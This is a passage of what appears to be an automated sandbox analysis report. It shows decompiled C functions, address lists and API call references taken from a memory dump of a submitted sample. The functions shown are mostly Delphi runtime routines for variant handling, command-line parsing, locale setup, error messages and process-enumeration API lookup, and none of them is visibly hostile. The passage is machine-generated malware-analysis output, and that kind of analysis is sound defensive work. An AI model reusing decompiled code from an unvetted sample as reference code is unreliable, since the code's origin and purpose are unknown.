    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040CA40, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
    C-Code - Quality: 100%
    			E0040CA40() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
				 *0x4547f4 = _t46;
				return _t46;
			}






    0x0040ca4e
    0x0040ca62
    0x0040ca78
    0x0040ca8e
    0x0040caa4
    0x0040caba
    0x0040cad0
    0x0040cae6
    0x0040cafc
    0x0040cb12
    0x0040cb28
    0x0040cb3e
    0x0040cb54
    0x0040cb6a
    0x0040cb80
    0x0040cb96
    0x0040cbac
    0x0040cbc2
    0x0040cbd8
    0x0040cbee
    0x0040cc04
    0x0040cc1a
    0x0040cc2a
    0x0040cc30
    0x0040cc37

    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00402858, Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00404478(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















    0x0040285c
    0x0040285e
    0x0040286a
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x00402874
    0x00402877
    0x00402884
    0x00402886
    0x004028cd
    0x004028cd
    0x004028d1
    0x00000000
    0x00000000
    0x0040288c
    0x004028c0
    0x004028c9
    0x004028cb
    0x00000000
    0x004028cb
    0x00402894
    0x004028a6
    0x004028a6
    0x004028aa
    0x00000000
    0x00000000
    0x00402899
    0x004028a2
    0x004028a4
    0x004028a4
    0x004028b3
    0x004028bb
    0x004028bb
    0x004028b3
    0x004028d7
    0x004028dc
    0x004028de
    0x004028e0
    0x00402935
    0x00402935
    0x00402939
    0x00000000
    0x00000000
    0x004028e6
    0x00402921
    0x00402928
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040292a
    0x0040292a
    0x0040292c
    0x0040292f
    0x00402930
    0x00402931
    0x00000000
    0x0040292a
    0x004028ee
    0x00402907
    0x00402907
    0x0040290b
    0x00000000
    0x00000000
    0x004028f3
    0x004028fa
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004028fc
    0x004028fc
    0x004028fe
    0x00402901
    0x00402902
    0x00402903
    0x004028fc
    0x00402914
    0x0040291c
    0x0040291c
    0x00402914
    0x00402941
    0x0040287f
    0x0040287f
    0x00000000
    0x0040287f
    0x00402877

    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040A4A4, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 56
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x45308c; // 0x454044
				if( *_t14 == 0) {
					_t16 =  *0x452f6c; // 0x405f30
					_t9 = _t16 + 4; // 0xffe9
					_t18 =  *0x454660; // 0x400000
					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x452f90; // 0x454214
				E00402784(E00402A8C(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00407764( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
			}












    0x0040a4b3
    0x0040a4b8
    0x0040a4c0
    0x0040a527
    0x0040a52c
    0x0040a530
    0x0040a53b
    0x00000000
    0x0040a551
    0x0040a4c2
    0x0040a4cc
    0x0040a4db
    0x0040a4eb
    0x0040a4fe
    0x00000000

    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00401A74, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62
    C-Code - Quality: 72%
    			E00401A74() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4545bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401B4A);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L0040130C();
					}
					 *0x4545bc = 0;
					_t3 =  *0x45461c; // 0x0
					LocalFree(_t3);
					 *0x45461c = 0;
					_t19 =  *0x4545e4; // 0x4545e4
					while(_t19 != 0x4545e4) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401374(0x4545e4);
					E00401374(0x4545f4);
					E00401374(0x454620);
					_t14 =  *0x4545dc; // 0x0
					while(_t14 != 0) {
						 *0x4545dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x4545dc; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401b51);
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L00401314();
					}
					_push(0x4545c4);
					L0040131C();
					return 0;
				}
			}










    0x00401a75
    0x00401a7f
    0x00401b53
    0x00401a85
    0x00401a87
    0x00401a88
    0x00401a8d
    0x00401a90
    0x00401a9a
    0x00401a9c
    0x00401aa1
    0x00401aa1
    0x00401aa6
    0x00401aad
    0x00401ab3
    0x00401aba
    0x00401abf
    0x00401ad9
    0x00401ace
    0x00401ad2
    0x00401ad7
    0x00401ad7
    0x00401ae6
    0x00401af0
    0x00401afa
    0x00401aff
    0x00401b06
    0x00401b0a
    0x00401b11
    0x00401b16
    0x00401b1b
    0x00401b21
    0x00401b24
    0x00401b27
    0x00401b33
    0x00401b35
    0x00401b3a
    0x00401b3a
    0x00401b3f
    0x00401b44
    0x00401b49
    0x00401b49

    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040B514, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40b7df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040B3A0();
				E00409E60(__ebx, __edi, __esi);
				_t196 =  *0x454744;
				if( *0x454744 != 0) {
					E0040A038(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E00409DB0(_t43, 0, 0x14,  &_v20);
				E00403EDC(0x454678, _v20);
				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00403EDC(0x454684, _v36);
				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00403EDC(0x454688, _v44);
				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
				E00403EDC(0x454690, _v52);
				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
				E00403EDC(0x454694, _v56);
				E00403E88( &_v12);
				E00403E88( &_v16);
				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
				_t104 = E00407174(0x40b7f4, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00403F20( &_v8, 0x40b84c);
				} else {
					E00403F20( &_v8, 0x40b840);
				}
				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
				_t111 = E00407174(0x40b7f4, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
					if(E00407174(0x40b7f4, 0, _t198) != 0) {
						E00403F20( &_v12, 0x40b868);
					} else {
						E00403F20( &_v16, 0x40b858);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404208();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404208();
				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040B7E6);
				return E00403EAC( &_v68, 0x10);
			}

























    0x0040b514
    0x0040b514
    0x0040b515
    0x0040b517
    0x0040b51c
    0x0040b51c
    0x0040b51e
    0x0040b520
    0x0040b520
    0x0040b523
    0x0040b526
    0x0040b527
    0x0040b52c
    0x0040b52f
    0x0040b532
    0x0040b537
    0x0040b53c
    0x0040b543
    0x0040b545
    0x0040b545
    0x0040b54f
    0x0040b55e
    0x0040b56b
    0x0040b580
    0x0040b58f
    0x0040b5a4
    0x0040b5b3
    0x0040b5c6
    0x0040b5d9
    0x0040b5ee
    0x0040b5fd
    0x0040b610
    0x0040b625
    0x0040b630
    0x0040b63d
    0x0040b652
    0x0040b65d
    0x0040b66a
    0x0040b67d
    0x0040b692
    0x0040b69f
    0x0040b6b4
    0x0040b6c1
    0x0040b6c9
    0x0040b6d1
    0x0040b6e6
    0x0040b6f0
    0x0040b6f5
    0x0040b6f7
    0x0040b710
    0x0040b6f9
    0x0040b701
    0x0040b701
    0x0040b725
    0x0040b72f
    0x0040b734
    0x0040b736
    0x0040b748
    0x0040b759
    0x0040b772
    0x0040b75b
    0x0040b763
    0x0040b763
    0x0040b759
    0x0040b777
    0x0040b77a
    0x0040b77d
    0x0040b782
    0x0040b78f
    0x0040b794
    0x0040b797
    0x0040b79a
    0x0040b79f
    0x0040b7ac
    0x0040b7bf
    0x0040b7c6
    0x0040b7c9
    0x0040b7cc
    0x0040b7de

    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040DBC0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040C5A0();
					return E0040D7EC(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040C9F4();
						_t113 = _t54;
						if(_t113 == 0) {
							E0040D544(_t100);
						}
						E0040DB18(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0040DB34(_v788 - 1, _t115) != 0) {
								L0040CA0C();
								E0040D7EC(_v792);
								L0040CA0C();
								E0040D7EC( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0040DB64(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040C9FC();
							E0040D7EC(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040CA04();
							E0040D7EC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























    0x0040dbc0
    0x0040dbcc
    0x0040dbd2
    0x0040dbd4
    0x0040dbde
    0x0040dbe5
    0x0040dbe5
    0x0040dbea
    0x0040dbf8
    0x0040dd71
    0x0040dd78
    0x0040dd79
    0x00000000
    0x0040dbfe
    0x0040dc01
    0x0040dc13
    0x0040dc03
    0x0040dc08
    0x0040dc08
    0x0040dc22
    0x0040dc2e
    0x0040dc31
    0x0040dc9e
    0x0040dca4
    0x0040dca5
    0x0040dcab
    0x0040dcac
    0x0040dcae
    0x0040dcb3
    0x0040dcb7
    0x0040dcb9
    0x0040dcb9
    0x0040dcc4
    0x0040dccf
    0x0040dcda
    0x0040dce3
    0x0040dce6
    0x0040dd02
    0x0040dd09
    0x0040dd14
    0x0040dd2b
    0x0040dd30
    0x0040dd44
    0x0040dd49
    0x0040dd5c
    0x0040dd5c
    0x0040dd65
    0x0040dce8
    0x0040dce8
    0x0040dce9
    0x0040dcef
    0x0040dcf5
    0x0040dcf7
    0x0040dcf9
    0x0040dcfc
    0x0040dcff
    0x0040dcff
    0x0040dd02
    0x00000000
    0x00000000
    0x00000000
    0x0040dd02
    0x0040dc33
    0x0040dc33
    0x0040dc34
    0x0040dc36
    0x0040dc3c
    0x0040dc3e
    0x0040dc4d
    0x0040dc4e
    0x0040dc58
    0x0040dc59
    0x0040dc5e
    0x0040dc69
    0x0040dc6a
    0x0040dc74
    0x0040dc75
    0x0040dc7a
    0x0040dc95
    0x0040dc97
    0x0040dc98
    0x0040dc9b
    0x0040dc9b
    0x00000000
    0x0040dc3c
    0x0040dc31

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00403C90, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x454044 == 0) {
					if( *0x419030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
						 *0x454230();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
				}
			}





    0x00403c98
    0x00403cf8
    0x00403d08
    0x00403d08
    0x00403d0e
    0x00403c9a
    0x00403ca3
    0x00403cb3
    0x00403cb3
    0x00403ccf
    0x00403cf0
    0x00403cf0

    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040B9A0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41
    C-Code - Quality: 100%
    			E0040B9A0() {
				struct HINSTANCE__** _t2;
				void* _t3;
				struct HINSTANCE__** _t5;
				struct HRSRC__* _t7;
				struct HINSTANCE__** _t8;
				intOrPtr* _t11;
				intOrPtr* _t12;
				struct HINSTANCE__* _t13;

				_t2 =  *0x452f9c; // 0x45402c
				if( *_t2 != 0) {
					_t5 =  *0x452f9c; // 0x45402c
					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
					_t8 =  *0x452f9c; // 0x45402c
					return LoadResource( *_t8, _t7);
				}
				_t3 = 0;
				_t11 =  *0x4530b8; // 0x419034
				_t12 =  *_t11;
				if(_t12 != 0) {
					while(1) {
						_t13 =  *(_t12 + 4);
						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
						if(_t3 != 0) {
							goto L5;
						}
						_t12 =  *_t12;
						if(_t12 != 0) {
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t3;
			}











    0x0040b9a3
    0x0040b9ab
    0x0040b9b4
    0x0040b9bc
    0x0040b9c2
    0x00000000
    0x0040b9ca
    0x0040b9d1
    0x0040b9d3
    0x0040b9d9
    0x0040b9dd
    0x0040b9df
    0x0040b9e8
    0x0040b9f3
    0x0040b9fa
    0x00000000
    0x00000000
    0x0040b9fc
    0x0040ba00
    0x00000000
    0x00000000
    0x00000000
    0x0040ba00
    0x0040b9df
    0x0040ba05
    0x0040ba05

    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
